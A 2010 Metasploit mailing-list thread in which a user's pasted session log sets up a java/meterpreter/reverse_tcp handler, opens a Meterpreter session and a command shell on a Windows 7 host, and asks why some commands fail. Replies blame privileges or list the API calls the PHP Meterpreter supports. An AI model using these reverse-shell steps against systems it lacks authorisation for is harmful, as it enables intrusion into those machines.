Re: Meterpreter commands failing

[Carlos Perez <carlos_perez () darkoperator com>]

Each version of meterpreter have their own list of supported commands, for example the API Calls  supported for the PHP 
versions 

stdapi_fs_expand_path
stdapi_fs_chdir
stdapi_fs_delete
stdapi_fs_getwd
stdapi_fs_ls
stdapi_fs_stat
stdapi_fs_delete_file
stdapi_sys_config_getuid
stdapi_sys_config_rev2self
stdapi_sys_config_sysinfo
stdapi_sys_process_execute
stdapi_sys_process_get_processes
stdapi_sys_process_getpid
stdapi_sys_process_kill
stdapi_net_socket_tcp_shutdown
channel_create_stdapi_fs_file
channel_create_stdapi_net_tcp_client
channel_create_stdapi_net_udp_client
core_channel_open
core_channel_eof
core_channel_read
core_channel_write
core_channel_close
core_channel_interact
core_loadlib

for Java if you look at:
http://www.metasploit.com/redmine/projects/framework/repository/show/external/source/meterpreter/java/src/stdapi/com/metasploit/meterpreter/stdapi

you will see the calls supported, there are plans to have the menu only show those entries supported for a future 
release. 

Regards,
Carlos

On Oct 18, 2010, at 9:52 PM, Tasos Laskos wrote:

> My guess is lack of necessary privileges on the exploited system.
> The same thing happens with all meterpreter payloads.
>
> - Tasos
>
>
> On 19/10/10 02:46, Matthew Presson wrote:
> > When trying to run some meterpreter commands (use priv, ps, getpid, etc) they fail with "Operation failed" messages. 
> >  Here is some of the output from the session.
> >
> >       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
> > + -- --=[ 612 exploits - 306 auxiliary
> > + -- --=[ 215 payloads - 27 encoders - 8 nops
> >       =[ svn r10741 updated today (2010.10.19)
> >
> >
> > msf > use multi/handler
> > msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
> > PAYLOAD => java/meterpreter/reverse_tcp
> > msf exploit(handler) > set LHOST 192.168.1.10
> > LHOST => 192.168.1.10
> > msf exploit(handler) > exploit
> >
> > [*] Started reverse handler on 192.168.1.10:4444 <http://192.168.1.10:4444>
> > [*] Starting the payload handler...
> > ^C[-] Exploit exception: Interrupt
> > [*] Exploit completed, but no session was created.
> > msf exploit(handler) > exploit
> >
> > [*] Started reverse handler on 192.168.1.10:4444 <http://192.168.1.10:4444>
> > [*] Starting the payload handler...
> > [*] Sending stage (26938 bytes) to 192.168.1.4
> > [*] Meterpreter session 1 opened (192.168.1.10:4444 <http://192.168.1.10:4444> -> 192.168.1.4:3022 
> > <http://192.168.1.4:3022>) at 2010-10-18 20:34:16 -0500
> >
> >
> > meterpreter > use priv
> > Loading extension priv...
> > [-] Failed to load extension: No such file or directory - /opt/metasploit3/msf3/data/meterpreter/ext_server_priv.jar
> > meterpreter > getpid
> > [-] stdapi_sys_process_getpid: Operation failed:
> > meterpreter > ps
> > [-] stdapi_sys_process_get_processes: Operation failed:
> > meterpreter > getprivs
> > ============================================================
> > Enabled Process Privileges
> > ============================================================
> > [-] stdapi_sys_config_getprivs: Operation failed:
> > meterpreter > sysinfo
> > Computer: Windows7
> > OS      : Windows 7 6.1 (x86)
> > meterpreter > getuid
> > Server username: AdminUser
> > meterpreter > shell
> > Process 1 created.
> > Channel 1 created.
> > Microsoft Windows [Version 6.1.7600]
> > Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
> >
> > C:\Users\AdminUser\Desktop>
> >
> >
> > Am I doing something wrong, or are these limitations a product of the java/meterpreter payload?
> >
> > -- 
> > Matt
> >
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework